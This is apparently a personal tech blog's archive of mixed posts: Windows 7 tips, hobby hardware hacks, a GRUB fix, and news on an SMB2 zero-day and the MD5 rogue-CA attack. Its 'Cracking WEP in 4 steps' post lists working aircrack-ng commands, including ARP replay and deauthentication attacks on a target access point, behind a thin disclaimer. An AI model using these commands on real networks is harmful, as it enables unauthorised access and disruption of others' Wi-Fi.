Category Archives: Hacking

Windows 7 zero day exploit

A security researcher has said there is a zero-day vulnerability affecting Windows 7 and Vista.

The flaw in Windows 7 could allow an attack which would cause a critical system error, or “Blue Screen of Death”, according to researcher Laurent Gaffie.

Gaffie wrote in his blog that the flaw lies in a Server Message Block 2 (SMB2) driver.

“SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality,” wrote Gaffie in a blog post on Monday.

Gaffie said he had contacted Microsoft. Comments on his blog by other users said that the flaw could lead not only to denial of service, but could also lead to remote code execution.

Computer security publication ‘The H’ wrote on Tuesday that its German sister publication had tested the proof-of-concept code, and that while the exploit had caused a reboot on Vista, the exploit had not worked on Windows 7.

Metasploit creator HD Moore said in a tweet on Tuesday that an SMB bug appeared to have been introduced into Vista SP1. Coder Josh Goebel said in a blog post that he had added the exploit code to Metasploit.

Microsoft had not responded to a request for comment at the time of writing.

from : Zdnet UK

Windows 7 tricks and secrets

Lately I installed windows 7 on my xps 1210 and its awesome. I had been discovering small tricks in win 7 and then I stumbled upon to this mega tricks list of the OS on msdn blogs.

Enjoy.

  1. Windows Management. By now, you’ve probably seen that Windows 7 does a lot to make window management easier: you can “dock” a window to the left or right half of the screen by simply dragging it to the edge; similarly, you can drag the window to the top of the screen to maximize it, and double-click the window top / bottom border to maximize it vertically with the same horizontal width. What you might not know is that all these actions are also available with keyboard shortcuts:
    • Win+Left Arrow and Win+Right Arrow dock;
    • Win+Up Arrow and Win+Down Arrow maximizes and restores / minimizes;
    • Win+Shift+Up Arrow and Win+Shift+Down Arrow maximizes and restores the vertical size.

    This side-by-side docking feature is particularly invaluable on widescreen monitors – it makes the old Windows way of shift-clicking on two items in the taskbar and then using the context menu to arrange them feel really painful.

  2. Display Projection. Had enough of messing around with weird and wonderful OEM display driver utilities to get your notebook display onto an external projector? In that case, you’ll be pleased to know that projection is really quick and simple with Windows 7. Just hit Win+P, and you’ll be rewarded by the following pop-up window:
    The Win+P Projector Settings window allows you to quickly switch display settings.
    Use the arrow keys (or keep hitting Win+P) to switch to “clone”, “extend” or “external only” display settings. You can also access the application as displayswitch.exe.

    If you want broader control over presentation settings, you can also press Win+X to open the Windows Mobility Center, which allows you to turn on a presentation “mode” that switches IM clients to do not disturb, disables screensavers, sets a neutral wallpaper etc. (Note that this feature is also available in Windows Vista.)

  3. Cut Out The Clutter. Working on a document in a window and want to get rid of all the extraneous background noise? Simply hit Win+Home to minimize all the non-active background windows, keeping the window you’re using in its current position. When you’re ready, simply press Win+Home again to restore the background windows to their original locations.
  4. Multi-Monitor Windows Management. The earlier tip on window management showed how you can dock windows within a monitor. One refinement of those shortcuts is that you can use Win+Shift+Left Arrow and Win+Shift+Right Arrow to move windows from one monitor to another – keeping them in the same relative location to the monitor’s top-left origin.
  5. Command Junkies Only. One of the most popular power toys in Windows XP was “Open Command Prompt Here”, which enabled you to use the graphical shell to browse around the file system and then use the context menu to open a command prompt at the current working directory. In Windows 7 (and in Windows Vista, incidentally – although not many folk knew about it), you can simply hold the Shift key down while selecting the context menu to get exactly the same effect. If the current working directory is a network location, it will automatically map a drive letter for you.
  6. It’s a Global Village. If you’ve tried to change your desktop wallpaper, you’ve probably noticed that there’s a set of wallpapers there that match the locale you selected when you installed Windows. (If you picked US, you’ll see beautiful views of Crater Lake in Oregon, the Arches National Park, a beach in Hawai’i, etc.) In fact, there are several sets of themed wallpapers installed based on the language you choose, but the others are in a hidden directory. If you’re feeling in an international mood, simply browse to C:\Windows\Globalization\MCT and you’ll see a series of pictures under the Wallpaper directory for each country. Just double-click on the theme file in the Theme directory to display a rotation through all the pictures for that country. (Note that some countries contain a generic set of placeholder art for now.)
  7. The Black Box Recorder. Every developer wishes there was a way that an end-users could quickly and simply record a repro for the problem that they’re running into that is unique to their machine. Windows 7 comes to the rescue! Part of the in-built diagnostic tools that we use internally to send feedback on the product, the Problem Steps Recorder provides a simple screen capture tool that enables you to record a series of actions. Once you hit “record”, it tracks your mouse and keyboard and captures screenshots with any comments you choose to associate alongside them. Once you stop recording, it saves the whole thing to a ZIP file, containing an HTML-based “slide show” of the steps. It’s a really neat little tool and I can’t wait for it to become ubiquitous on every desktop! The program is called psr.exe; you can also search for it from Control Panel under “Record steps to reproduce a problem”.
    The Problem Steps Recorder provides an easy way for users to record a problem repro for later diagnosis.
  8. The Font of All Knowledge. Long Zheng will be happy: we’ve got rid of the Add Fonts dialog that has served Windows faithfully for the last twenty years. (Of course, for most of that time, it’s been deprecated – the easy way to install a set of fonts has simply been to drag them into the Fonts folder via Control Panel.) But now font installation is really easy – we’ve added an “Install” button to the font viewer applet that takes care of the installation process:
    You can install a font in Windows 7 from the standard font viewer dialog.
    There are lots of other new features built into Windows 7 that will satisfy those of a typographic bent, incidentally – grouping multiple weights together, the ability to hide fonts based on regional settings, a new text rendering engine built into the DirectWrite API, and support in the Font common file dialog for more than the four “standard” weights. For example:
    The new common font dialog in Windows 7 supports more than four weights for a font.
  9. Gabriola. As well as the other typographic features mentioned above, Windows 7 includes Gabriola, an elaborate display type from the Tiro Typeworks foundry that takes advantage of OpenType Layout to provide a variety of stylistic sets, flourishes and ornamentation ligatures:
    Some sample variants of the Gabriola display font.
  10. Who Stole My Browser? If you feel like Internet Explorer is taking a long time to load your page, it’s worth taking a look at the add-ons you have installed. One of the more helpful little additions in Internet Explorer 8 is instrumentation for add-on initialization, allowing you to quickly see whether you’re sitting around waiting for plug-ins to load. Just click Tools / Manage Add-ons, and then scroll right in the list view to see the load time. On my machine, I noticed that the Research add-on that Office 2007 installs was a particular culprit, and since I never use it, it was simple to disable it from the same dialog box.
  11. Rearranging the Furniture. Unless you’ve seen it demonstrated, you may not know that the icons in the new taskbar aren’t fixed in-place. You can reorder them to suit your needs, whether they’re pinned shortcuts or running applications. What’s particularly nice is that once they’re reordered, you can start a new instance of any of the first five icons by pressing Win+1, Win+2, Win+3 etc. I love that I can quickly fire up a Notepad2 instance on my machine with a simple Win+5 keystroke, for instance.What’s less well-known is that you can similarly drag the system tray icons around to rearrange their order, or move them in and out of the hidden icon list. It’s an easy way to customize your system to show the things you want, where you want them.
  12. Installing from a USB Memory Stick. My wife has a Samsung NC10 netbook (very nice machine, by the way), and we wanted to install Windows 7 Beta on this machine to replace the pre-installed Windows XP environment. Like most netbook-class devices, this machine has no built-in media drive, and nor did I have an external USB DVD drive available to boot off. The solution: I took a spare 4GB USB 2.0 thumbdrive, reformatted it as FAT32, and simply copied the contents of the Windows 7 Beta ISO image to the memory stick using xcopy e:\ f:\ /e /f (where e: was the DVD drive and f: was the removable drive location). Not only was it easy to boot and install from the thumbdrive, it was also blindingly fast: quicker than the corresponding DVD install on my desktop machine.It’s also worth noting in passing that Windows 7 is far better suited to a netbook than any previous operating system: it has a much lighter hard drive and memory footprint than Windows Vista, while also being able to optimize for solid state drives (for example, it switches off disk defragmentation since random read access is as fast as sequential read access, and it handles file deletions differently to minimize wear on the solid state drive).
  13. I Want My Quick Launch Toolbar Back! You might have noticed that the old faithful Quick Launch toolbar is not only disabled by default in Windows 7, it’s actually missing from the list of toolbars. As is probably obvious, the concept of having a set of pinned shortcut icons is now integrated directly into the new taskbar. Based on early user interface testing, we think that the vast majority of users out there (i.e. not the kind of folk who read this blog, with the exception of my mother) will be quite happy with the new model, but if you’re after the retro behavior, you’ll be pleased to know that the old shortcuts are all still there. To re-enable it, do the following:
    • Right-click the taskbar, choose Toolbars / New Toolbar
    • In the folder selection dialog, enter the following string and hit OK:
      %userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
    • Turn off the “lock the taskbar” setting, and right-click on the divider. Make sure that “Show text” and “Show title” are disabled and the view is set to “small icons”.
    • Use the dividers to rearrange the toolbar ordering to choice, and then lock the taskbar again.

    If it’s not obvious by the semi-tortuous steps above, it’s worth noting that this isn’t something we’re exactly desperate for folks to re-enable, but it’s there if you really need it for some reason. Incidentally, we’d love you to really try the new model first and give us feedback on why you felt the new taskbar didn’t suit your needs.

  14. It’s a Drag. Much play has been made of the Jump Lists feature in Windows 7, allowing applications like Windows Live Messenger to offer an easy task-based entry point. Jump lists replace the default right-click context menu in the new taskbar; another way to access them (particularly useful if you’re running Windows 7 on a one-button MacBook) is by left-clicking and dragging up in a kind of “swooshing” motion. This was designed for touch-enabled devices like the beautiful HP TouchSmart all-in-one PC, where the same gesture applies.Another place where you can “swoosh” (not an official Microsoft term) is the IE 8 address bar, where the downward drag gesture brings up an expanded list containing the browser history, favorites and similar entries. The slower you drag, the cooler the animation!
  15. Standards Support. Every review of Windows 7 that I’ve seen has noted the revamped WordPad and Paint applets that add an Office-like ribbon to expose their functionality. Few, however, have noticed one small but hopefully appreciated feature: WordPad can now read and write both the Word 2007-compatible Office Open XML file format but also the OpenDocument specification that IBM and Sun have been advocating:
    WordPad in Windows 7 allows you to save in ODF or OOXML formats.
  16. Windows Vista-Style Taskbar. I wasn’t initially a fan of the Windows 7 taskbar when it was first introduced in early Windows 7 builds, but as the design was refined in the run up to the beta, I was converted and now actively prefer the new look, particularly when I’ve got lots of windows open simultaneously. For those who really would prefer a look more reminiscent of Windows Vista, the good news is that it’s easy to customize the look of the taskbar to more closely mirror the old version:
    The Windows 7 Taskbar can be configured for a Windows Vista compatibility view.
    To achieve this look, right-click on the taskbar and choose the properties dialog. Select the “small icons” checkbox and under the “taskbar buttons” setting, choose “combine when taskbar is full”. It’s not pixel-perfect in accuracy, but it’s close from a functionality point of view.
  17. Peeking at the Desktop. While we’re on the taskbar, it’s worth noting a few subtleties. You’ve probably seen the small rectangle in the bottom right hand corner: this is the feature we call “Aero Peek”, which enables you to see any gadgets or icons you’ve got on your desktop. I wanted to note that there’s a keyboard shortcut that does the same thing – just press Win+Space.
  18. Running with Elevated Rights. Want to quickly launch a taskbar-docked application as an administrator? It’s easy – hold down Ctrl+Shift while you click on the icon, and you’ll immediately launch it with full administrative rights (assuming your account has the necessary permissions, of course!)
  19. One More of the Same, Please. I’ve seen a few folk caught out by this one. If you’ve already got an application open on your desktop (for example, a command prompt window), and you want to open a second instance of the same application, you don’t have to go back to the start menu. You can simply hold down the Shift key while clicking on the taskbar icon, and it will open a new instance of the application rather than switching to the existing application. For a keyboard-free shortcut, you can middle-click with the third mouse button to do the same thing. (This trick assumes that your application supports multiple running instances, naturally.)
  20. Specialized Windows Switching. Another feature that power users will love is the ability to do a kind of “Alt+Tab” switching across windows that belong to just one application. For example, if you’ve got five Outlook message windows open along with ten other windows, you can quickly tab through just the Outlook windows by holding down the Ctrl key while you repeatedly click on the single Outlook icon. This will toggle through each of the five Outlook windows in order, and is way faster than opening Alt+Tab and trying to figure out which of the tiny thumbnail images relates to the specific message you’re trying to find.
  21. Walking Through the Taskbar. Another “secret” Windows shortcut: press Win+T to move the focus to the taskbar. Once you’re there, you can use the arrow keys to select a particular window or group and then hit Enter to launch or activate it. As ever, you can cancel out of this mode by hitting the Esc key. I don’t know for sure, but I presume this shortcut was introduced for those with accessibility needs. However, it’s equally valuable to power users – another good reason for all developers to care about ensuring their code is accessible.
  22. image The Widescreen Tip. Almost every display sold these days is widescreen, whether you’re buying a notebook computer or a monitor. While it might be great for watching DVDs, when you’re trying to get work done it can sometimes feel like you’re a little squeezed for vertical space.As a result, the first thing I do when I set up any new computer is to dock the taskbar to the left hand side of the screen. I can understand why we don’t set this by default – can you imagine the complaints from enterprise IT departments who have to retrain all their staff – but there’s no reason why you as a power user should have to suffer from default settings introduced when the average screen resolution was 800×600.

    In the past, Windows did an indifferent job of supporting “side dockers” like myself. Sure, you could move the taskbar, but it felt like an afterthought – the gradients would be wrong, the Start menu had a few idiosyncrasies, and you’d feel like something of a second-class citizen. The Windows 7 taskbar feels almost as if it was designed with vertical mode as the default – the icons work well on the side of the screen, shortcuts like the Win+T trick mentioned previously automatically switch from left/right arrows to up/down arrows, and so on. The net effect is that you wind up with a much better proportioned working space.

    Try it – in particular, if you’ve got a netbook computer that has a 1024×600 display, you’ll immediately appreciate the extra space for browsing the Internet. For the first day you’ll feel a little out of sync, but then I guarantee you’ll become an enthusiastic convert!

  23. Pin Your Favorite Folders. If you’re always working in the same four or five folders, you can quickly pin them with the Explorer icon on the taskbar. Hold the right-click button down and drag the folder to the taskbar, and it will be automatically pinned in the Explorer Jump List.
  24. Starting Explorer from “My Computer”. If you spend more time manipulating files outside of the documents folders than inside, you might want to change the default starting directory for Windows Explorer so that it opens at the Computer node:
    The Computer node in Windows 7.
    To do this, navigate to Windows Explorer in the Start Menu (it’s in the Accessories folder). Then edit the properties and change the target to read:
    %SystemRoot%\explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

    If you want the change to affect the icon on the taskbar, you’ll need to unpin and repin it to the taskbar so that the new shortcut takes affect. It’s worth noting that Win+E will continue to display the documents library as the default view: I’ve not found a way to change this from the shell at this time.
  25. ClearType Text Tuning and Display Color Calibration. If you want to tune up your display for image or text display, we have the tools included out of the box. It’s amazing what a difference this makes: by slightly darkening the color of the text and adjusting the gamma back a little, my laptop display looks much crisper than it did before. You’d adjust the brightness and contrast settings on that fancy 42” HDTV you’ve just bought: why wouldn’t you do the same for the computer displays that you stare at every day?
    image image
    Check out cttune.exe and dccw.exe respectively, or run the applets from Control Panel.
  26. ISO Burning. Easy to miss if you’re not looking for it: you can double-click on any DVD or CD .ISO image and you’ll see a helpful little applet that will enable you to burn the image to a blank disc. No more grappling for shareware utilities of questionable parentage!
    You can burn an ISO image to disk with this built-in utility in Windows 7.
  27. Windows Movie Maker. Windows 7 doesn’t include a movie editing tool – it’s been moved to the Windows Live Essentials package, along with Photo Gallery, Mail and Messenger. Unfortunately, Windows Live Movie Maker is currently still in an early beta that is missing most of the old feature set (we’re reworking the application), and so you might be feeling a little bereft of options. It goes without saying that we intend to have a better solution by the time we ship Windows 7, but in the meantime the best solution for us early adopters is to use Windows Movie Maker 2.6 (which is essentially the same as the most recent update to the Windows XP version). It’s missing the full set of effects and transitions from the Windows Vista version, and doesn’t support HD editing, but it’s pretty functional for the typical usage scenario of home movie editing.
    Windows Movie Maker 2.6 is compatible with Windows 7.
    Download Windows Movie Maker 2.6 from here:
    http://microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc
  28. Hiding the Windows Live Messenger Icon. Hopefully your first act after Windows 7 setup completed was to download and install the Windows Live Essentials suite of applications (if not, then you’re missing out on a significant part of the Windows experience). If you’re a heavy user of IM, you may love the way that Windows Live Messenger is front and central on the taskbar, where you can easily change status and quickly send an IM to someone:
    Windows Live Messenger appears by default on the taskbar.
    On the other hand, you may prefer to keep Windows Live Messenger in the system tray where it’s been for previous releases. If so, you can fool the application into the old style of behavior. To do this, close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode. Bingo!
  29. Enjoy The Fish. I’m surprised that not many people seem to have caught the subtle joke with the Siamese fighting fish that is part of the default background, so I’ll do my part at keeping the secret hidden. Check out wikipedia for a clue.
  30. When All Else Fails… There are always those times when you’re in a really bad spot – you can’t boot up properly, and what you really want is something you can quickly use to get at a command prompt so you can properly troubleshoot. Windows 7 now includes the ability to create a system repair disc, which is essentially a CD-bootable version of Windows that just includes the command prompt and a suite of system tools. Just type “system repair disc” in the Start Menu search box, and you’ll be led to the utility.

from: msdn blogs

Mac OS X 10.5.6 on my XPS 1210

I have been fascinated by the Apple’s Mac OS ever since I got to know about it. And when I came to know that I could install it on my laptop, I was delighted. I have been successfull in installing various versions from days of OS X 10.4 [Tiger]. Lately I thought of installing 10.5.6 and upgrading it to 10.5.7 on the same old XPS m1210 which I bought in November 2006.

My XPS Mac

Mac OsX 10.5.6 on my XPS m1210 with triple boot.

My previous posts.

Leopard 10.5.1 [Kalyway] on my XPS1210

My Dell o MAC

Mac OSX + XP dual boot

XPS 1210 camera hack.

I got hold of an additional logitech camera that is used in Dell XPS 1210 [just dont ask me how]. I had no use of it as i already had my XPS camera replaced. It laid in my drawer for several weeks and then one day I decided to connect it to my desktop for my younger brother to VDO chat with me.

The advantage of this camera is that it is USB and has a builtin microphone.

So no hassels of connecting a mic to the rear of the cabinet.

What all you need…

1. image007

XPS 1210 camera.

2. image008

USB extension cable and USB connector

3. image009

Something to cut wires and plastic.

4. A CD case of 10 CDs [ the ususal round plastic one ].

What i did was simply cut wires of the camera connector, took another USB connector and connected the same colored wires. Tested it and It worked.

image010 image011 image014

I cut the CD box cover to screw the camera on the hinges like structure that i cut from the same plastic.

I also made a cut on the edge to fix the USB connector.

image015

This is how it looked like after being done.

I used aUSB extension cable to plug the camera into the USB ports on the rear panel of my desktop.

The reason for using the extension was to keep it modular and most of all I didn’t want to cut the extension cable as it was a new one 😉 and It remains usable with other devices.

image017 image016

The above pictures show the end result. And u can see it working!

Bluetooth Headset Antenna Hack

I had an old Orchid mono bluetooth headset lying around in my drawer since so many months. The reson for not using was, I didnt own a bluetooth enabled phone 😉 . Now that i got one. I tried to test it.

3-in-1

And to my disappointment the range was not too good and there was interference when i kept my phone in my trouser pocket. I guess my bidy was acting as a dampner.

So I decided to increase the lenght of its antenna by adding a lenght of copper wire. I know this sounds crazy but sheer craziness works many a times.

It did work and following is how I did it.

I ripped apart my headset.

Took  a small lenght of insulated copper wire. Thin and the kind that is used in small 3V motor winding.antena

all-apart

There in the picture above you can notice a small white bix kinda thing. It has one end connected to the circuit and the other was free.

So making a calculated blind guess, I soldered the wire to the open end and exended the antenna.

open

And wow. It did work.

I then packed it up and took out the wire near the microphone at bottom and then bent it along the crevice to secure it. The extra length was cut off. Now I get enough signal to hear clearly in my ear waht is being transmitted from my Nokia 6500

Leopard, Ubuntu and Windows XP multiboot

I have been a fan of the Mac OS ever since i cam to know about it. When i got my first computer I tried my best to make the windows look like mac but it was not upto my expectations and buys a mac was not an option for me. Then came the OSX86 project and it made my dream come true. I started experimenting with OSX 10.4.8 and kept trying to get it working on my Minimachine [xps 1210]. It took me around 6 months and several GBs of downloads to get tit to work.

I joined college for MBA and the Mac os in its latest flavour named the leopard was with me till i had to let go of it to install Linux because I had never thought that I would be installing 3 OSs simultameously and it went on like that for 6 more months and i was without mac os. Today I reinstalled macosx 10.5.2 and it jsut didnt boot as I had Ubuntu too installed previously and i got the Grub error…

Then I did the following to fix grub and added an entry into grub for booting macosx…

How to fix grub….

1. Boot the Desktop/Live CD. (Use Ubuntu 8.04 or later)

2. Open a terminal (Applications -> Accessories -> Terminal)

3. Start grub as root with the following command :

     sudo grub

4. You will get a grub prompt (see below) which we will use to find the root partition and install grub to the MBR (hd0)

         [ Minimal BASH-like line editing is supported.   For
         the   first   word,  TAB  lists  possible  command
         completions.  Anywhere else TAB lists the possible
         completions of a device/filename. ]

grub>

Type the following and press enter:

find /boot/grub/stage1

If you get "Error 15: File not found", try the following:

find /grub/stage1

Using this information, set the root device (fill in X,Y with whatever the find command returned):

grub> root (hd0,3) // for me it was (hd0,3)

Install Grub:

grub> setup (hd0)

Exit Grub:

grub> quit

Boot into Ubuntu

Open Terminal and run this command.

" sudo gedit /boot/grub/menu.lst "
it will allow to configure your boot order.

3) Edit your OSX in Editor Window.

title OSX86

root (hd0,0) " Replace with your Partition of OSX "

chainloader +1

Now Grub lets me choose which os to boot….

Ubuntu

Leopard

Windows XP

Grub on minimachine
Grub on minimachine

when i chose leopard I am presented with the Darwinx86 booot loader which presents to me all partitions to boot from an if i choose Linux from Darwin then i again get back to Grub…. 🙂

Darwin boot loader on minimachine
Darwin boot loader on minimachine

I just can keep switching between boot loaders and boot any os that I want….

The existing issues of single core only and no camera and card reader and no shut down still bug me… The shutdown and sleep had worked for me at times but not always.

How to export directory listing to text file

I did this a coupl of times and every time i had to look or the information on the web so this time i sortof thought to document it for reference and many others might find it usefull too.

It comes in handy when large list of files with their paths has to be created. As one can not type in the paths for say a directory containing 1000 or so images but to really need to do that for some data base or a gallary.

To do this we just need to type in a single lin in command promt and all s done…

1) Open the command line (cmd.exe in NT/2000/XP)
2) Navigate to the required directory using the cd command.
3) type dir /b>filelist.txt

A file called filelist.txt will be created with the directory contents. If you want to create the file list elsewhere, use a fully qualified file name or use the ..\ convention. Don’t forget that Windows uses \ not / as directory delimiters.

PS3 used to crack ssl

A team of security researchers and academics has broken a core piece of internet technology. They made their work public at the 25th Chaos Communication Congress in Berlin today. The team was able to create a rogue certificate authority and use it to issue valid SSL certificates for any site they want. The user would have no indication that their HTTPS connection was being monitored/modified.

This attack is possible because of a flaw in MD5. MD5 is a hashing algorithm; each unique file has a unique hash. In 2004, a team of Chinese researchers demonstrated creating two different files that had the same MD5 hash. In 2007, another team showed theoretical attacks that took advantage of these collisions. The team focused on SSL certificates signed with MD5 for their exploit.

The first step was doing some broad scans to see what certificate authorities (CA) were issuing MD5 signed certs. They collected 30K certs from Firefox trusted CAs. 9K of them were MD5 signed. 97% of those came from RapidSSL.

Having selected their target, the team needed to generate their rogue certificate to transfer the signature to. They employed the processing power of 200 Playstation 3s to get the job done. For this task, it’s the equivalent of 8000 standard CPU cores or $20K of Amazon EC2 time. The task takes ~1-2 days to calculate. The tricky part was knowing the content of the certificate that would be issued by RapidSSL. They needed to predict two variables: the serial number and the timestamp. RapidSSL’s serial numbers were all sequential. From testing, they knew that RapidSSL would always sign six seconds after the order was acknowledged. Knowing these two facts they were able to generate a certificate in advance and then purchase the exact certificate they wanted. They’d purchase certificates to advance the serial number and then buy on the exact time they calculated.

The cert was issued to their particular domain, but since they controlled the content, they changed the flags to make themselves an intermediate certificate authority. That gave them authority to issue any certificate they wanted. All of these ‘valid’ certs were signed using SHA-1.

If you set your clock back to before August 2004, you can try out their live demo site. This time is just a security measure for the example and this would work identically with a certificate that hasn’t expired. There’s a project site and a much more detailed writeup than this.

To fix this vulnerability, all CAs are now using SHA-1 for signing and Microsoft and Firefox will be blacklisting the team’s rogue CA in their browser products.

source

Cracking WEP in 4 steps

Desclaimer: This is just to show that how insecure WEP is. This guide is not meant to teach how to crack. Use on own discretion. I am not to be held responsible for any harm done.

Prerequisites:

BackTrack 3

Supported wireless card

10 minutes of your time.

 

Step 1: Set the wireless card into monitor mode

>airmon-ng start eth0

“airmon-ng” is the program itself.

“eth0” The name of my wireless card.

 

Step2: Check for available networks and the one you wish to find the key.

Command = “airodump-ng -w capture -c 6 ath0”

“airodump-ng” is the program itself.

“-w capture” Gets it to write the sniffed packets to a file called “capture.cap”.

“-c 6” Makes the program ONLY sniff on channel 6.

“eth0” The name of my wireless card.

 

Step3: Generate some traffic on your own to save time.

Command = “aireplay-ng –arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0”

“aireplay-ng” Name of the program.

“–arpreplay” Is the function of aireplay you are trying to perform, in this case it’s a replay of a ARP request, which will contain IV data.

“-b 00:11:22:33:44:55” MAC address of the target AP.

“-h 66:77:88:99:00:AA” MAC address of the target machine connected to that AP.

“eth0” Name of my wireless card.

Command = “aireplay-ng -e Linksys -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA –deauth 10 ath0”

“aireplay-ng” is the program itself

“-e Linksys” is the name of the SSID of the target AP.

“-a 00:11:22:33:44:55” is the MAC address of the target AP.

“-c 66:77:88:99:00:AA” is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).

“–deauth 10” The type of attack we’re performing, in this case it’s the DEAUTH attack repeated 10 times.

“eth0” The name of my wireless card.

optional step 

 

Step4: Do the cracking of the accumulated packets.

Command= “aircrack-ng capture-01.cap

“aircrack-ng” is the program itself.

Capture is the name of the file we wrote packets into.  -01 is added automatically to the filename and .cap is the extension

Once you hit enter , you would be presented with an index. Select the index number of your AP and hit enter. Wait for the decryption to complete. If enough packets have been captured the key would be decrypted and shown at the end.

 

HACK ATTACK [Convert a straight lan cable to patch in 2 minutes]

This about making a patch or cross over cable if u have many straight spare ones lying around as was the case with me. I needed a patch cable to network my pc and notebook but had left my patch cable at one of my friends. This is a simple 2 minute hack which would allow you to convert a straight cable to patch.

Requirements:-

Straight LAN cable [the ones that connect routers and modems to your computer]

A pair of scissors or a Wire stipper [ I would recommend good ones becuse we wud be cutting wires]

Tape [ you might want to cover up the lose ends and exposed wires ]

Cut the cable from the middle. We only need 4 wires the orange pair and green pair.

strip the wire pairs about 1 cm

connect the solid green to solid orange and connect the stipped green to stripped orange and u are done.

This wont take u more than 5 minutes even if you are a noob.

Now use tape if u want. I left mine as such.

Connect the two computers using this wire.

Goto network connections and select appropriate network adapter then goto its properties and then select tcp/ip and assign an ip address in range 192.168.1.x

where x is any number between 1 and 255

do the same with other computer too but this time choose some other value for x.

Now we need to set up out computer for p2p networking.

We need to follow this on both computers.

In network connections left side pane click set up small home or office network then next just select the third option in the lists and keep going nexting. [sorry for very crude instructions no time…. wiring from college lab ;)] will edit it to add more detail once i have time…

Restart both the computers and Ping if u get a reply u are doneand congratz to u.

If not trouble shoot just google it or mail me. I wud be glad to help.